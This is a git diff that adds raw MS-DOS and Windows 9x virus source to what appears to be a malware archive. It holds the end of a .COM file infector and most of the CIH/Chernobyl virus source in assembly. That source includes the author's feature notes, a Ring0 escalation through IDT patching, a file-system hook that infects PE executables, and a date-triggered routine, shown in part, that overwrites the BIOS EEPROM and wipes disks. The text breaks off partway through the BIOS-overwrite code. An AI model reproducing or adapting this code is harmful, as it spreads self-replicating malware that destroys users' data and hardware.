al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.cih.txt b/MSDOS/Virus.MSDOS.Unknown.cih.txt new file mode 100644 index 00000000..b03b576e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih.txt @@ -0,0 +1,1165 @@ +**************************************************************************** + +; * The Virus Program Information * +; +**************************************************************************** + +; * + * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.2 * +; * Modification Time : 05/21/1998 + * +; * * +; +*==========================================================================* + +; * Modification History * +; +*==========================================================================* + +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. + * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. + * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; +*==========================================================================* + +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; +*==========================================================================* + +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; +**************************************************************************** + + + .586P + +; +**************************************************************************** + +; * Original PE Executable File(Don't Modify this Section) + * +; +**************************************************************************** + + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; +**************************************************************************** + +; * My Virus Game + * +; +**************************************************************************** + + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 +DEBUG = TRUE +MajorVirusVersion = 1 +MinorVirusVersion = 2 +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + +IF DEBUG + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h +ELSE + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h +ENDIF + +FileNameBufferSize = 7fh +; ********************************************************* +VirusGame SEGMENT + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* +MyVirusStart: + push ebp +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + lea eax, [esp-04h*2] + xor ebx, ebx + xchg eax, fs:[ebx] + call @0 +@0: + pop ebx + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + push eax +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + cli + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + lea esi, MyExceptionHook-@1[ecx] + push esi + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + pop esi +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + push esi + mov esi, eax +LoopOfMergeAllVirusCodeSection: + mov ecx, [eax-04h] + rep movsb + sub eax, 08h + mov esi, [eax] + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + jmp LoopOfMergeAllVirusCodeSection +QuitLoopOfMergeAllVirusCodeSection: + pop esi +; ************************************* +; * Generate Exception Again * +; ************************************* + int HookExceptionNumber ; GenerateException Again +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* +ReadyRestoreSE: + sti + xor ebx, ebx + jmp RestoreSE +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* +StopToRunVirusCode: +@1 = StopToRunVirusCode + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] +RestoreSE: + pop dword ptr fs:[ebx] + pop eax +; ************************************* +; * Return Original App to Execute * +; ************************************* + pop ebp + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + ret ; Return to Original App Entry Point +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* +MyExceptionHook: +@2 = MyExceptionHook + jz InstallMyFileSystemApiHook +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + iretd +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* +AllocateSystemMemoryPage: + mov dr0, ebx ; Set the Mark of My Virus Exist in System + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + xchg edi, eax ; EDI = SystemMemory Start Address + lea eax, MyVirusStart-@2[esi] + iretd ; Return to Ring3 Initial Program +; ************************************* +; * Install My File System Api Hook * +; ************************************* +InstallMyFileSystemApiHook: + lea eax, FileSystemApiHook-@6[edi] + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + mov dr0, eax ; Save OldFileSystemApiHook Address + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + jmp ExitRing0Init +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* +CodeSizeOfMergeVirusCodeSection = offset $ +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* +InstallFileSystemApiHook: + push ebx + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + mov dr0, eax ; Adjust OldFileSystemApiHook Address + pop eax + pop ebx + ret +; ********************************************************* +; * Static Data * +; ********************************************************* +OldInstallFileSystemApiHook dd ? +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* +FileSystemApiHook: +@3 = FileSystemApiHook + pushad + call @5 ; +@5: ; + pop esi ; mov esi, offset +VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 +; ************************************* +; * Is OnBusy !? * +; ************************************* + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc +; ************************************* +; * Is OpenFile !? * +; ************************************* + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook +; ************************************* +; * Enable OnBusy * +; ************************************* + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + push esi + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + add al, 40h + mov ah, ':' + mov [esi], eax + inc esi + inc esi +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy +IF DEBUG +; ************************************* +; * Only for Debug * +; ************************************* + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy +ENDIF +; ************************************* +; * Is Open Existing File !? * +; ************************************* + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy +; ************************************* +; * Get Attributes of the File * +; ************************************* + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + jc DisableOnBusy + push ecx +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] +; ************************************* +; * Is Read-Only File !? * +; ************************************* + test cl, 01h + jz OpenFile +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Open File * +; ************************************* +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + xchg ebx, eax ; mov ebx, FileHandle +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + pop ecx + pushf + test cl, 01h + jz IsOpenFileOK +; ************************************* +; * Restore Attributes of the File * +; ************************************* + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Is Open File OK !? * +; ************************************* +IsOpenFileOK: + popf + jc DisableOnBusy +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + push esi ; Push FileNameBuffer Address to Stack + pushf ; Now CF = 0, Push Flag to Stack + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer +; *************************** +; * Get OffsetToNewHeader * +; *************************** + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + mov edx, [esi] +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + dec edx + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + push ebx ; Save File Handle + push 00h ; Set VirusCodeSectionTableEndMark +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer +; *************************** +; * Save ESP Register * +; *************************** + mov dr1, esp +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + push eax ; Size +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + mov al, SizeOfScetionTable + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + mul cl +; *************************** +; * Let's Set Section Table * +; *************************** + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + inc ecx + push ecx ; Save NumberOfSections+1 + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + add ecx, eax + add ecx, edx + sub ecx, (SizeOfHeaders-@9)[esi] + jnc short OnlySetInfectedMark + not ecx + inc ecx + cmp cx, small CodeSizeOfMergeVirusCodeSection + jb OnlySetInfectedMark +; *************************** +; * Save Original * +; * Address of Entry Point * +; *************************** + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + xchg ecx, eax ; ECX = Size of Section Table + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax +; *************************** +; * Read All Section Tables * +; *************************** + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + push edi ; Size + add edx, eax + push edx ; Pointer of File + add eax, esi + push eax ; Address of Buffer +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + lea eax, [eax+edi-04h] + mov [eax], ebx +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + push ebx ; Size + add edx, edi + push edx ; Pointer of File + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + mov (NewAddressOfEntryPoint-@9)[esi], edx +; *************************** +; * Setup Initial Data * +; *************************** + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + jmp StartToWriteCodeToSections +; *************************** +; * Write Code to Sections * +; *************************** +LoopOfWriteCodeToSections: + add edx, SizeOfScetionTable + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + push ebx ; Size + sub eax, 08h + mov [eax], ebx + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + push edi ; Address of Buffer + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h +StartToWriteCodeToSections: + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + add edi, ebx ; Move Address of Buffer +EndOfWriteCodeToSections: + loop LoopOfWriteCodeToSections +; *************************** +; * Only Set Infected Mark * +; *************************** +OnlySetInfectedMark: + mov esp, dr1 + jmp WriteVirusCodeToFile +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + lea eax, (LastVxDCallAddress-2-@9)[esi] + mov cl, VxDCallTableSize +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + loop LoopOfRestoreVxDCallID +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] +LoopOfWriteVirusCodeToFile: + pop ecx + jecxz SetFileModificationMark + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + jmp LoopOfWriteVirusCodeToFile +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** +SetFileModificationMark: + pop ebx + pop eax + stc ; Enable CF(Carry Flag) + pushf +; ************************************* +; * Close File * +; ************************************* +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + popf + pop esi + jnc IsKillComputer +; ************************************* +; * Restore File Modification Time * +; ************************************* + mov ebx, edi + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Disable OnBusy * +; ************************************* +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* +prevhook: + popad + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + mov [ebx+1ch], eax ; Modify EAX Value in Stack +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** +QuitMyVirusFileSystemHook: + popad + ret +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + lea ebx, EnableEEPROMToWrite-@10[esi] + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + push ecx + loop $ +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + xor ah, ah + mov [eax], al + xchg ecx, eax + loop $ +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + 